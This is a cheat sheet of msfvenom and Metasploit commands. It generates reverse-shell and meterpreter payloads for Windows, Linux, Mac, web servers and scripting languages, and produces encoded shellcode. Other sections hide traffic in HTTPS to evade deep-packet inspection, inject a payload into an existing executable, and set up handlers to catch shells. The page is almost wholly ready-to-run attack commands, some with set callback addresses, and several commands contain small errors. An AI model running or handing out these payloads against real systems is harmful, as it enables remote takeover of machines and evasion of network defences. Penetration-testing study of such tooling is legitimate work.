MSFVENOM

For creating one liner payloads. Handy, dandy, with a sip of brandy. 

service postgresql start && service metasploit start 

List payloads

msfvenom -l

LIST PAYLOAD OPTIONS

msfvenom --payload-options -p      windows/shell/reverse_tcp

Binaries

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

 

Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

 

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

 

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 

Windows Based Shellcode

Shellcode in python

msfvenom -a x86 —platform windows -p windows/exec cmd=calc.exe -b ”\00\z0a\x0d” -f python

Shellcode in C

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=x LPORT= -x x86/shikata_ga_nai -b “\00\0a\01” -i 3 -f c

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 

———————————————————————————————————————————-

Expanding a bit more

Windows | Meterpreter

Standard meterpreter

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe 
  2. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp 

Meterpreter HTTPS

It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe 

Non-staged payload

Can use multi handler for non-staged payloads

  1. msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe 
  2. use exploit/multi/handler 
  3. set payload windows/shell_reverse_tcp 

Staged payload

Must use meterpreter to catch

  1. msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe 
  2. use exploit/multi/handler 
  3. set payload windows/shell/reverse_tcp 

Inject payload into binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe 

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

Meterpreter

  1. $ ./msfconsole -q use exploit/multi/handler 
  2. set payload windows/meterpreter/reverse_tcp 
  3. set lhost 192.168.1.123 
  4. set lport 4444 run  

Using reverse_tcp

  1. msfconsole -q use exploit/multi/handler 
  2. set payload windows/shell/revers_tcp 
  3. set LHOST  set LPORT  run

  

Reference

Peleus

https://netsec.ws/?p=331

https://xapax.gitbooks.io/security/content/reverse-shell.html